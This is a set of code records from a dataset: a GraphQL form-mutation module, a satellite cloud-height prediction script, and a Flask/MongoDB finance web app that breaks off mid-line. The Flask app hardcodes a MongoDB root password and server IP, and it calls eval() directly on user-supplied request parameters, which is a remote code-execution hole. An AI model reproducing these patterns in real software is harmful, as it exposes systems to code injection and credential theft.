isinstance(self.observation, np.ndarray):\n\t\t\tassert self.size == 
self.observation.shape[0], 'replay inside error'\n\t\telse:\n\t\t\tassert self.size == 0\n\t\treturn self.size","sub_path":"ppo0.2/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550548059","text":"from models.form import FormTemplate\nfrom models.field import EmbeddedField\nfrom .utils import DBInterface\nfrom .field import EmbeddedFieldType, EmbeddedFieldInput, AddField, EditField, RemoveField\nfrom graphene import (ObjectType, Mutation, InputObjectType,\n String, Boolean, ID, List, Field, InputField)\n\n\nclass CommonAttributes(object):\n name = String()\n title = String()\n description = String()\n collections = List(ID)\n\n\n######################################################################\n\n\nclass FormInterface(CommonAttributes, DBInterface):\n fields = List(EmbeddedFieldType)\n field = Field(EmbeddedFieldType, _id=ID(required=True))\n default_collection = ID()\n links = List(ID)\n\n @staticmethod\n def resolve_field(root, info, _id):\n return root.find_field_by_id(_id)\n\n\nclass FormType(ObjectType):\n class Meta:\n name = \"Form\"\n description = \"...\"\n interfaces = (FormInterface,)\n\n\n######################################################################\n\n\nclass FormInput(CommonAttributes, InputObjectType):\n fields = InputField(List(EmbeddedFieldInput))\n\n\nclass CreateForm(InputObjectType):\n form_data = InputField(FormInput, required=True)\n\n\nclass UpdateForm(InputObjectType):\n form_id = ID(required=True)\n form_data = InputField(FormInput, required=True)\n\n\nclass DeleteForm(InputObjectType):\n form_id = ID(required=True)\n\n\nclass FormOps(Mutation):\n class Meta:\n name = \"FormOps\"\n description = \"...\"\n\n class Arguments:\n create = CreateForm()\n update = UpdateForm()\n delete = DeleteForm()\n\n add_field = AddField()\n edit_field = EditField()\n remove_field = RemoveField()\n\n ops = List(String)\n ok = Boolean()\n form = Field(lambda: FormType)\n\n @staticmethod\n def mutate(root, info, create=None, update=None, delete=None,\n add_field=None, edit_field=None, remove_field=None, **kwargs):\n ops = []\n ok = False\n form = None\n\n if create:\n ops.append(\"create\")\n\n form = FormTemplate(**create.form_data)\n\n try:\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if update:\n ops.append(\"update\")\n\n form = FormTemplate.find_by_id(update.form_id)\n\n try:\n for atr, val in update.form_data.items():\n if hasattr(form, atr) and atr != \"fields\":\n setattr(form, atr, val)\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if add_field:\n ops.append(\"add_field\")\n\n form = FormTemplate.find_by_id(add_field.form_id)\n field = EmbeddedField(**add_field.field_data)\n\n try:\n form.fields.insert(field.index, field)\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if edit_field:\n ops.append(\"edit_field\")\n\n form = FormTemplate.find_by_id(edit_field.form_id)\n\n try:\n field = form.find_field_by_id(edit_field.field_id)\n index = edit_field.field_data.get(\"index\", field.index)\n if index != field.index:\n form.fields.remove(field)\n form.fields.insert(index, field)\n\n for atr, val in edit_field.field_data.items():\n if hasattr(field, atr):\n setattr(field, atr, val)\n\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if remove_field:\n ops.append(\"remove_field\")\n\n 
form = FormTemplate.find_by_id(remove_field.form_id)\n\n try:\n field = form.find_field_by_id(remove_field.field_id)\n form.fields.remove(field)\n form.save()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n if delete:\n ops.append(\"delete\")\n\n form = FormTemplate.find_by_id(delete.form_id)\n\n try:\n form.delete()\n ok = True\n except Exception as e:\n print(str(e))\n ok = False\n\n return FormOps(ok=ok, ops=ops)\n\n return FormOps(ok=ok, form=form, ops=ops)\n\n","sub_path":"app/api/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"429614546","text":"\n# coding: utf-8\n\n# In[12]:\n\n\nimport numpy as np\nimport scipy.io as scio\nimport h5py\nfrom sklearn.externals import joblib\nimport warnings\n# from scipy import interpolate\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n# from mpl_toolkits.basemap import interp\n# from mpl_toolkits.basemap import maskoceans\n\nnp.set_printoptions(suppress= True)\nwarnings.filterwarnings('ignore')\n\n\n# In[13]:\n\n\n# load models\nxgb_clf = joblib.load('model/xgb_clf_0.9083.m')\nxgb_r = joblib.load('model/xgb_r_1386.7171.m')\n# path\nfilename = r'D:\\Himawari\\AHI8_OBI_4000M_NOM_20190223_0020.hdf'\npath_out = r'D:\\Himawari\\out'\nfilename_out = 'AHI8_TOP_' + filename.split('_')[4] + '_' + filename.split('_')[5].split('.')[0]\n\n\n# In[14]:\n\n\ndef get_LonLat(l,c):\n coff = 1375.5\n loff = 1375.5\n cfac = 10233128\n lfac = 10233128\n ea = 6378.137\n eb = 6356.7523\n h = 42164\n lamda_Himawari_8 = 140.7\n x = (np.pi * (c - coff))/(180 * np.exp2(-16) * cfac)\n y = (np.pi * (l - coff))/(180 * np.exp2(-16) * lfac)\n sd = np.sqrt((h * np.cos(x) * np.cos(y))**2 - (np.cos(y)**2 + ea**2/eb**2 * np.sin(y)**2) * ((h**2) - ea**2))\n sn = (h * np.cos(x) * np.cos(y) - sd)/(np.cos(y)**2 + ea**2/eb**2 * np.sin(y)**2)\n s1 = h - sn * np.cos(x) * np.cos(y)\n s2 = sn * np.sin(x) * np.cos(y)\n s3 = -sn * np.sin(y)\n sxy = np.sqrt(s1**2 + s2**2)\n lon = (180/np.pi)*np.arctan(s2/s1) + lamda_Himawari_8\n lat = (180/np.pi)*np.arctan((ea**2/eb**2) * (s3/sxy))\n return lon,lat\n\n\n# In[15]:\n\n\n# readfile\ndata_hdf = h5py.File(filename,'r')\n\n# assign 16 features\nup = 110\ndown = 1120\nleft = 0\nright = 1370\nfeatures = np.ones((down - up,right - left,16),dtype = 'float32')\nfeatures[:,:,0] = data_hdf['NOMChannelVIS0064_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,1] = data_hdf['NOMChannelVIS0086_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,2] = data_hdf['NOMChannelVIS0160_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,3] = data_hdf['NOMChannelVIS0230_4000'][up:down,left:right].astype('float16')/10000\nfeatures[:,:,4] = data_hdf['NOMChannelIRX0390_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,5] = data_hdf['NOMChannelIRX0620_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,6] = data_hdf['NOMChannelIRX0700_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,7] = data_hdf['NOMChannelIRX0730_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,8] = data_hdf['NOMChannelIRX0860_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,9] = data_hdf['NOMChannelIRX0960_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,10] = data_hdf['NOMChannelIRX1040_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,11] = 
data_hdf['NOMChannelIRX1120_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,12] = data_hdf['NOMChannelIRX1230_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,13] = data_hdf['NOMChannelIRX1330_4000'][up:down,left:right].astype('float16')/100\nfeatures[:,:,14] = data_hdf['NOMSatelliteZenith'][up:down,left:right].astype('float16')/100\nfeatures[:,:,15] = data_hdf['NOMSunZenith'][up:down,left:right].astype('float16')/100\nfeatures[:,:,0] = features[:,:,0]/np.cos(np.deg2rad(features[:,:,15]))\n\n# close & clear\n# data_hdf.close()\n# del data_hdf\n\n\n# In[16]:\n\n\n# do some mask\nmask = np.ones(features.shape,dtype= 'bool')\nmask = np.where(features[:,:,0]< 0.01,True,False)\nfor i in range(16):\n features[:,:,i] = np.ma.masked_array(features[:,:,i],mask)\n\n\n# In[17]:\n\n\n# classify\nfeatures_reshaped = features.reshape(-1,16)\ncloud_clfed = xgb_clf.predict(features_reshaped)\nindex = np.where(cloud_clfed == 1)\n\n\n# In[18]:\n\n\n# regress\ncloud_clfed[index] = xgb_r.predict(features_reshaped[index])\n\n\n# In[19]:\n\n\n# reshape\ncloud_clfed = cloud_clfed.reshape(features.shape[0:2])\ncloud_clfed = np.where(cloud_clfed < 0, 0, cloud_clfed)\n# cloud_clfed = np.ma.masked_array(cloud_clfed,mask)\n\n\n# In[20]:\n\n\n# lon,lat,mask 掉反射率小于1%的\nlat, lon = np.meshgrid(range(left,right),range(up,down))\nlat = np.ma.array(lat,mask= mask)\nlon = np.ma.array(lon,mask= mask)\n# index_lonlat = np.where(mask == False)\nlons, lats = get_LonLat(lon,lat)\nlons[lons > 180] -= 360\n\n\n# 等经纬度插值(失败)\n# lat = np.arange(10,60.01,0.04)\n# lon = np.arange(70,140.01,0.04)\n\n# lons_out, lats_out = np.meshgrid(lon,lat)\n# interpFun = interpolate.interp2d(lats[500:600,500:600],lons[500:600,500:600],cloud_clfed[500:600,500:600],kind= 'cubic')\n# cloud_clfed = interp(cloud_clfed,lons,lats,lons_out,lats_out)\n\n\n# In[21]:\n\n\n# 画图\nfig = plt.figure(1,figsize=(8,8),dpi = 100)\n\nax = fig.add_subplot(111)\nm_1 = Basemap( llcrnrlon = 70, llcrnrlat = 10, urcrnrlon = 140, urcrnrlat = 60, \n projection = 'cyl')\n# m_1 = Basemap( projection = 'ortho', lat_0 = 0, lon_0 = 140 )\nm_1.drawcoastlines(linewidth= 0.5)\nm_1.drawmeridians(np.arange(70.,141.,10.),labels=[0, 0, 0, 1],fontsize=10)\nm_1.drawparallels(np.arange(10.,61.,10.),labels=[1, 0, 0, 0],fontsize=10)\n\nX,Y = m_1(lons,lats)\ncloud_clfed = np.ma.masked_array(cloud_clfed, mask = X.mask)\ncs = m_1.contourf(X,Y,cloud_clfed)\n\ncbar = m_1.colorbar(cs,'bottom',pad = '5%')\ncbar.set_label('H of cloud /m')\n# plt.colorbar(ax = ax)\n# m_1.imshow(cloud_clfed[::-1])\nfig.savefig(path_out + '\\\\' + filename_out + '.jpg')\nplt.show()\n\n\n# In[25]:\n\n\nf_cloud = h5py.File(path_out + '\\\\' + filename_out + '.hdf','w')\nf_cloud['cloud_clfed'] = cloud_clfed\nf_cloud['lons'] = lons\nf_cloud['lats'] = lats\nf_cloud.close() \n\n","sub_path":"XGBboost_cloud.py","file_name":"XGBboost_cloud.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"546401857","text":"#coding: utf-8\nfrom flask import Flask,render_template,redirect,url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask import request\nimport pandas as pd\nimport numpy as np\nfrom numpy import NAN\nfrom pandas import DataFrame\n\nfrom pymongo import MongoClient\nimport time,datetime,json\nfrom flask import Flask, jsonify\nfrom flask_httpauth import HTTPBasicAuth\nauth = HTTPBasicAuth()\n\nclient=MongoClient('mongodb://root:' + '5768116' + '@139.196.79.93')\ndb = client.huiyuan\ncollection = 
db.huiyuan \ncursor = collection.find()\nhuiyuan_df = pd.DataFrame(list(cursor))\n\ndb = client.jishi \ncollection = db.jishi \n\ndb2 = client.huiguang \ncollection2 = db2.huiguang \n\ndb3 = client.huiguangzhu \ncollection3 = db3.huiguangzhu \n\ndb4 = client.tongxun \ncollection4 = db4.tongxun\n\ndb5 = client.piaofen\ncollection5 = db5.piaofen\n\ndb6 = client.piaofenxi\ncollection6 = db6.piaofenxi\n\ndb7 = client.huiyuan\ncollection7 = db7.huiyuan \ncursor = collection7.find()\nhuiyuan_df= pd.DataFrame(list(cursor))\n\ndb9 = client.zixun\ncollection9 = db9.zixun\n\ndb10=client.tongxun\ncollection10 = db10.tongxun\n\ndb11=client.cundan\ncollection11 = db11.cundan\n#\ndb12=client.xianxia\ncollection12 = db12.xianxia\n\ndb13=client.number\ncollection13 = db13.number\n\n\napp=Flask(__name__)\nbootstrap=Bootstrap(app)\nb=2\njigou=''\ntt=''\nname=''\n@auth.get_password\ndef get_password(username):\n global tt\n for i in range (0,len(huiyuan_df)):\n if( username==str(huiyuan_df.loc[i,'username'])): \n tt=username\n return(huiyuan_df.loc[i,'password'])\n return None\n\n@auth.error_handler\ndef unauthorized():\n return render_template('regist.html')\n\n\n\n\n\n\n\n@app.route('/', methods=['GET'])\ndef get_tasks(task_id):\n if task_id==11: #票交所利率数据下载\n db8 = client.piaojiaosuo\n collection8 = db8.piaojiaosuo \n cursor8 = collection8.find()\n piaofen_df = pd.DataFrame(list(cursor8))\n if piaofen_df.empty:\n return('999')\n else:\n del piaofen_df['_id']\n\n piaofen_df=piaofen_df.to_json()\n return(piaofen_df)\n\n\n\n\n elif task_id==41: #同业通宝数据录入\n maiyin = request.args.get('maiyin')\n shijian = request.args.get('shijian')\n biao=maiyin.replace('dict_values(','')\n biao=biao.replace(')','')\n biao = eval(biao)\n biao_df=pd.DataFrame(biao)\n biao_df['报价日']=shijian\n\n biao_df= json.loads(biao_df.T.to_json()).values() \n \n db12 = client.xianxia\n collection12 = db12.xianxia\n cursor12 = collection12.find({\"$and\":[{'报价日':str(shijian)}]})\n xianxia_df = pd.DataFrame(list(cursor12))\n if xianxia_df.empty:\n collection12.insert(biao_df)\n return('already updated')\n\n \n\n\n\n \n elif task_id==31: #票交所发行量下载\n shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n shijian2 = datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n\n shijian3=shijian2-datetime.timedelta(days=1)\n shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n shijian4=shijian2-datetime.timedelta(days=29)\n shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n\n \n db9 = client.piaojiaosuo2\n collection9 = db9.piaojiaosuo2 \n cursor9 = collection9.find({'提取日期':{'$gte':shijian4}})\n piaofen_df = pd.DataFrame(list(cursor9))\n if piaofen_df.empty:\n return('999')\n else:\n del piaofen_df['_id']\n piaofen_df=piaofen_df.to_json()\n return(piaofen_df)\n\n elif task_id==21: #票交所利率数据录入\n maiyin = request.args.get('maiyin')\n maiyin=maiyin.replace('dict_values([','')\n maiyin=maiyin.replace('])','')\n maiyin = eval(maiyin)\n maiyin_df=pd.DataFrame(maiyin, index=[0])\n maiyin1= json.loads(maiyin_df.T.to_json()).values()\n\n \n maishang = request.args.get('maishang')\n maishang=maishang.replace('dict_values([','')\n maishang=maishang.replace('])','')\n maishang = eval(maishang)\n maishang_df=pd.DataFrame(maishang, index=[0])\n maishang1= json.loads(maishang_df.T.to_json()).values()\n \n huiyin = request.args.get('huiyin')\n huiyin=huiyin.replace('dict_values([','')\n huiyin=huiyin.replace('])','')\n huiyin = eval(huiyin)\n huiyin_df=pd.DataFrame(huiyin, index=[0])\n huiyin1= json.loads(huiyin_df.T.to_json()).values()\n\n huishang = 
request.args.get('huishang')\n huishang=huishang.replace('dict_values([','')\n huishang=huishang.replace('])','')\n huishang = eval(huishang)\n huishang_df=pd.DataFrame(huishang, index=[0])\n huishang1= json.loads(huishang_df.T.to_json()).values() \n shijian = request.args.get('shijian')\n \n db8 = client.piaojiaosuo\n collection8 = db8.piaojiaosuo\n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'买断式'},{'票据类型':'电银'}]})\n maiyin_df = pd.DataFrame(list(cursor8))\n if maiyin_df.empty:\n collection8.insert(maiyin1)\n\n \n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'买断式'},{'票据类型':'电商'}]})\n maishang_df = pd.DataFrame(list(cursor8))\n if maishang_df.empty:\n collection8.insert(maishang1)\n\n\n\n\n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'回购式'},{'票据类型':'电银'}]})\n huiyin_df = pd.DataFrame(list(cursor8))\n if huiyin_df.empty:\n collection8.insert(huiyin1)\n\n\n cursor8 = collection8.find({\"$and\":[{'提取日期':str(shijian)},{'业务类型':'回购式'},{'票据类型':'电商'}]})\n huishang_df = pd.DataFrame(list(cursor8))\n if huishang_df.empty:\n collection8.insert(huishang1)\n\n return('already updated')\n\n\n\n\n@app.route('/fasong',methods=['POST','GET'])\n@auth.login_required\ndef fasong():\n global tt,jigou,name\n shijian11=time.strftime('%y-%m-%d',time.localtime(time.time()))\n shijian11 = datetime.datetime.strptime(shijian11, \"%y-%m-%d\")\n shijian11=shijian11.strftime(\"%Y-%m-%d\") #今天\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) \n chu=0\n chucun=0\n chudai=0\n chufu=0\n chuhui=0\n chuli=0\n shou=0\n shoucun=0\n shoudai=0\n shouli=0\n shoufu=0\n shouhui=0\n if request.method == 'POST':\n\n if request.form['Submit']=='发送':\n value2= request.form.getlist('demo-checkbox')\n value3= request.form.get('demo-checkbox')\n for index, value in enumerate(value2):\n if value=='1':\n value2[index]='收票'\n shou=1\n if value=='2':\n value2[index]='出票'\n chu=1\n if value=='3':\n value2[index]='收代持'\n shoudai=1\n if value=='4':\n value2[index]='出代持'\n chudai=1\n if value=='5':\n value2[index]='收回购'\n shouhui=1\n if value=='6':\n value2[index]='出回购'\n chuhui=1\n if value=='7':\n value2[index]='收证'\n shoufu=1\n if value=='8':\n value2[index]='出证'\n chufu=1\n if value=='9':\n value2[index]='收理财'\n shouli=1\n if value=='10':\n value2[index]='出理财'\n chuli=1\n if value=='11':\n value2[index]='收存单'\n shoucun=1\n if value=='12':\n value2[index]='出存单'\n chucun=1\n shijian_t=time.strftime('%H:%M',time.localtime(time.time())) #\n\n\n#\n for i in range(0,len(huiyuan_df)):\n if str(huiyuan_df.loc[i,'username'])==tt:\n jigou=huiyuan_df.loc[i,'jigou']\n name=huiyuan_df.loc[i,'name']\n break\n\n \n data=pd.DataFrame({'发送日期':[shijian11], #\n '发送时间':[shijian_t], #\n '机构':[jigou],\n '用户':[name],\n '业务':[value2],#\n 'shou':shou,\n 'chu':chu,\n 'shoudai':shoudai,\n 'chudai':chudai,\n 'shouhui':shouhui,\n 'chuhui':chuhui,\n 'shoufu':shoufu,\n 'chufu':chufu,\n 'shouli':shouli,\n 'chuli':chuli,\n 'shoucun':shoucun,\n 'chucun':chucun, \n '备注':[request.form['username']], \n '用户名':[tt]\n }) #\n \n records = json.loads(data.T.to_json()).values() #\n collection2.insert(records) #\n\n\n return render_template('fasong.html')\n\n\n#\n\n \n@app.route('/zixun',methods=['POST','GET'])\ndef zixun():\n global b\n #sousuo=''\n zixun1_shun=[]\n zixun_df=[]\n zixun_dfs=pd.DataFrame({'时间':[], #\n '爬取日期':[], #\n '标题':[],#\n '权重':[],\n '序号':[],\n '链接':[],\n '网站':[],\n '国外':[]\n }) #\n shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n shijian2 = 
datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n   # shijian2=str(shijian2.strftime(\"%Y-%m-%d\"))\n\n    shijian3=shijian2-datetime.timedelta(days=1)\n    shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n    shijian4=shijian2-datetime.timedelta(days=29)\n    shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n\n    \n    cursor9= collection9.find({'网站':'交易云'})\n    yuanc=pd.DataFrame(list(cursor9))\n    yuanc=yuanc[['时间','标题','链接','网站','获取号']]\n    yuanc['时间'] = pd.to_datetime(yuanc['时间']).astype('str') #,format='%Y%m%d' convert the yyyy-m-d timestamps to the yyyy-mm-dd date format\n\n    yuanc= yuanc.sort_values(by=['获取号','时间'], ascending=True)\n    yuanc=yuanc.reset_index(drop = False)\n\n    \n    cursor9= collection9.find({'爬取日期':{'$gte':shijian3}})\n    #cursor9 = collection9.find({ \"$and\":[{'爬取日期':{'$gte':shijian3}},{'国外':0}]})\n    zixun_df = pd.DataFrame(list(cursor9))\n\n    if zixun_df.empty:\n        return render_template('zixun.html',zixun1_shun=json.dumps(zixun_shun),zixun=json.dumps(zixun_df),yuanc=yuanc,y=len(yuanc),b=b)\n\n    zixun_df=zixun_df[['时间','爬取日期','标题','权重','序号','链接','网站','国外']]\n    for i in range(0,len(zixun_df)):\n        if zixun_df.loc[i,'序号']=='':\n            zixun_df.loc[i,'序号']=zixun_df.loc[i,'网站']\n        \n    zixun_df=zixun_df[(zixun_df['国外']!=1)]\n    zixun_df= zixun_df.sort_values(by=['爬取日期','时间'], ascending=False)\n    zixun_df=zixun_df.reset_index(drop = True)\n    zixun_df=zixun_df[['时间','爬取日期','标题','权重','序号','链接','网站']]\n\n   # zixun_df1= zixun_df1[(len(zixun_df1)-min(20,len(zixun_df1))):len(zixun_df1)]\n\n    print(zixun_df)\n    zixun_shun=zixun_df['链接'].tolist()\n    zixun_df=zixun_df.set_index('链接').T.to_dict('list')\n\n\n\n    if request.method == 'POST':\n        if request.form['Submit']=='搜索':\n            cursor9 = collection9.find({ \"$and\":[{'爬取日期':{'$gte':shijian4}},{'标题':{'$regex':request.form['标题']}}]})\n            zixun_dfs = pd.DataFrame(list(cursor9))\n            if zixun_dfs.empty:\n                zixun_df=[]\n\n            else:\n                zixun_dfs=zixun_dfs[['时间','爬取日期','标题','权重','序号','链接','网站']]\n\n\n                \n                for i in range(0,len(zixun_dfs)):\n                    if zixun_dfs.loc[i,'序号']=='':\n                        zixun_dfs.loc[i,'序号']=zixun_dfs.loc[i,'网站']\n                \n                zixun_dfs= zixun_dfs.sort_values(by=['爬取日期','时间'], ascending=False)\n                zixun_dfs=zixun_dfs.reset_index(drop = True)\n                zixun_shun=zixun_dfs['链接'].tolist()\n                zixun_df=zixun_dfs.set_index('链接').T.to_dict('list')\n\n    return render_template('zixun.html',zixun1_shun=json.dumps(zixun_shun),zixun=json.dumps(zixun_df),yuanc=yuanc,y=len(yuanc),b=b)\n\n\n\n    \n@app.route('/yuanchuang',methods=['POST','GET'])\ndef yuanchuang():\n    global b\n    #sousuo=''\n    yuanc_shun=[]\n    yuanc=[]\n    zixun_dfs=pd.DataFrame({'时间':[], #\n                       '爬取日期':[], #\n                       '标题':[],#\n                       '权重':[],\n                       '序号':[],\n                       '链接':[],\n                       '网站':[],\n                       '国外':[]\n                     }) #\n    shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n    shijian2 = datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n    shijian3=shijian2-datetime.timedelta(days=1)\n    shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n    shijian4=shijian2-datetime.timedelta(days=29)\n    shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n\n    cursor9= collection9.find({'网站':'交易云'})\n    yuanc=pd.DataFrame(list(cursor9))\n#\n\n    if yuanc.empty:\n        yuanc=[]\n\n    yuanc=yuanc[['时间','标题','链接','网站','获取号']]\n    yuanc['时间'] = pd.to_datetime(yuanc['时间']).astype('str') #,format='%Y%m%d' convert the yyyy-m-d timestamps to the yyyy-mm-dd date format\n    yuanc= yuanc.sort_values(by=['获取号','时间'], ascending=True)\n    yuanc=yuanc.reset_index(drop = True)\n    yuanc_shun=yuanc['链接'].tolist()\n\n    yuanc=yuanc.set_index('链接').T.to_dict('list')\n\n    if request.method == 'POST':\n        if request.form['Submit']=='搜索':\n\n            cursor9 = collection9.find({ \"$and\":[{'网站':'交易云'},{'标题':{'$regex':request.form['标题']}}]})\n            yuanc = 
pd.DataFrame(list(cursor9))\n if yuanc.empty:\n yuanc=[]\n\n else:\n yuanc=yuanc[['时间','标题','链接','网站','获取号']]\n\n yuanc['时间'] = pd.to_datetime(yuanc['时间']).astype('str') #,format='%Y%m%d' 吧yyyy-m-d 转化为yyyy-mm-dd的时间格式\n yuanc= yuanc.sort_values(by=['获取号','时间'], ascending=True)\n yuanc=yuanc.reset_index(drop = True)\n yuanc_shun=yuanc['链接'].tolist()\n\n yuanc=yuanc.set_index('链接').T.to_dict('list')\n\n\n\n return render_template('yuanchuang.html',yuanc_shun=json.dumps(yuanc_shun),yuanc=json.dumps(yuanc))\n\n\n\n\n\n \n@app.route('/cundan',methods=['POST','GET'])\ndef cundan():\n cundan_df=''\n qixian=''\n if request.method == 'POST':\n if request.form['cundan']=='查询':\n yinhang=request.form['yin']\n qixian=request.form['good3']\n faxing=request.form['good']\n if yinhang =='':\n cundan_df='请输入要查找的银行存单'\n return render_template('cundan.html',cundan_df=cundan_df)\n\n if qixian=='不限':\n\n cursor11 = collection11.find({\"$or\":[{'银行分类':yinhang},{'发行人':{'$regex':yinhang}}]})\n \n else:\n cursor11 = collection11.find({ \"$and\":[{'期限':qixian},{\"$or\":[{'银行分类':yinhang},{'发行人':{'$regex':yinhang}}]}]})\n\n \n cundan_df=pd.DataFrame(list(cursor11))\n if cundan_df.empty:\n a='近期未发行存单。'\n return render_template('cundan.html',cundan_df=a)\n\n cundan_df=cundan_df[['发行人','发行日','期限','收益率','实际发行(亿)','计划发行(亿)','爬取日期']]\n\n cundan_df['计划发行(亿)']=cundan_df['计划发行(亿)'].astype('float') #要转化为string才能把NaN填充为空值\n cundan_df['实际发行(亿)']=cundan_df['实际发行(亿)'].astype('float') #要转化为string才能把NaN填充为空值\n cundan_df=cundan_df.where(cundan_df.notnull(), '') #把NAN换成空格\n # cundan_df.fillna(value='')\n # cundan_df.rdd.map({NaN:'','None':''})\n\n cundan_df=cundan_df.reset_index(drop = True)\n\n # for i in range(0,len(cundan_df)):\n # if (cundan_df.loc[i,'实际发行(亿)'] is None) or (cundan_df.loc[i,'实际发行(亿)'] is nan):\n # cundan_df.loc[i,'实际发行(亿)']='wu' \n\n # if (cundan_df.loc[i,'计划发行(亿)'] is None ) or (cundan_df.loc[i,'计划发行(亿)'] is nan):\n # cundan_df.loc[i,'计划发行(亿)']='wu' \n\n \n if faxing=='计划发行':\n cundan_df=cundan_df[(cundan_df['计划发行(亿)']!='')]\n cundan_df= cundan_df.sort_values(by=['发行日'], ascending=False)\n cundan_df= cundan_df.to_html(index=False)\n\n return render_template('cundan.html',cundan_df=cundan_df)\n\n elif faxing=='实际发行':\n cundan_df=cundan_df[(cundan_df['实际发行(亿)']!='')]\n cundan_df= cundan_df.sort_values(by=['发行日'], ascending=False)\n cundan_df= cundan_df.to_html(index=False)\n\n return render_template('cundan.html',cundan_df=cundan_df)\n\n \n cundan_df= cundan_df.sort_values(by=['发行日','爬取日期'], ascending=True)\n # cundan_df.drop_duplicates('发行日', keep='last') #删除重复广告\n \n\n cundan_df= cundan_df.to_html(index=False)\n\n return render_template('cundan.html',cundan_df=cundan_df)\n\n\n\n\n\n\n\n\n\n@app.route('/zijin',methods=['POST','GET'])\ndef image_zijin():\n return render_template('zijin.html')\n\n\n@app.route('/image',methods=['POST','GET'])\n#@auth.login_required\n\ndef image():\n h3=['票据数据展示']\n h4=['票据数据展示']\n # h5='会员操作,暂未开通'\n image_shun=[] #表格的顺序,用list来控制。因为js里面的for in 是没发控制显示顺序\n piaofenxi0=pd.DataFrame({'机构':[], #\n '收票':[], #\n '出票':[],#\n '收代持':[],#\n '出代持':[],\n '统计日期':[],\n '时间':[]\n }) #\n shou=''\n chu=''\n shouchubi=''\n\n if request.method == 'POST':\n if request.form['Submit']=='数据刷新':\n\n value2= request.form.getlist('demo-checkbox')\n\n shijian=time.strftime('%H:%M',time.localtime(time.time()))\n\n shijian2=time.strftime('%Y-%m-%d',time.localtime(time.time()))\n shijian2 = datetime.datetime.strptime(shijian2, \"%Y-%m-%d\")\n\n shijian3=shijian2-datetime.timedelta(days=1)\n 
shijian4=shijian2-datetime.timedelta(days=2)\n shijian5=shijian2-datetime.timedelta(days=14)\n\n shijian2=str(shijian2.strftime(\"%Y-%m-%d\"))\n\n shijian3=str(shijian3.strftime(\"%Y-%m-%d\"))\n shijian4=str(shijian4.strftime(\"%Y-%m-%d\"))\n shijian5=str(shijian5.strftime(\"%Y-%m-%d\"))\n\n cursor = collection5.find({\"$and\":[{'time':str(shijian2)}]})\n present_time = pd.DataFrame(list(cursor))\n if present_time.empty:\n cursor = collection5.find({\"$and\":[{'time':str(shijian3)}]})\n present_time = pd.DataFrame(list(cursor))\n shijian2=shijian3\n shijian='日终'\n if present_time.empty:\n cursor = collection5.find({\"$and\":[{'time':str(shijian4)}]})\n present_time = pd.DataFrame(list(cursor))\n shijian2=shijian4\n shijian='日终'\n\n\t\t\t\t\t\t\t\t\n \n huatudata3=present_time[['hanglei1','hanglei2','shou','chu','shoudai','chudai']]\n huatudata4=huatudata3.groupby(['hanglei1']).sum()\n huatudata5=huatudata3.groupby(['hanglei2']).sum()\n shou=huatudata5.ix[1,'shou']\n chu=huatudata5.ix[1,'chu']\n shouchubi=round((shou/chu+0.0001),2)\n if shijian>'17:30':\n shijian='日终'\n\n huatudata4['统计日期']=shijian2\n huatudata4['时间']=shijian\n\n huatudata4=huatudata4.reset_index(drop = False)\n huatudata4.rename(columns={'hanglei1':'机构','shou':'收票','chu':'出票','shoudai':'收代持','chudai':'出代持'}, inplace=True)\n huatudata4=huatudata4[['机构','收票','出票','收代持','出代持','统计日期','时间']]\n huatudata5=huatudata4\n huatudata5['时间加']=huatudata5['统计日期']+' '+huatudata5['机构']\n huatudata5=huatudata5[['时间加','收票','出票','收代持','出代持','时间']]\t\t\t \n # h3 = huatudata4.to_html(index=False)\n collection6.remove({'统计日期':str(shijian2)}) #删除早于该时间点的数据\n records = json.loads(huatudata4.T.to_json()).values()\n collection6.insert(records) \n \n if len(value2)==0:\n cursor = collection6.find({'统计日期':{'$gte':str(shijian5)}})\n\n piaofenxi = pd.DataFrame(list(cursor))\n piaofenxi0=piaofenxi[['机构','收票','出票','收代持','出代持','统计日期','时间']]\n piaofenxi0['时间加']=piaofenxi0['统计日期']+' 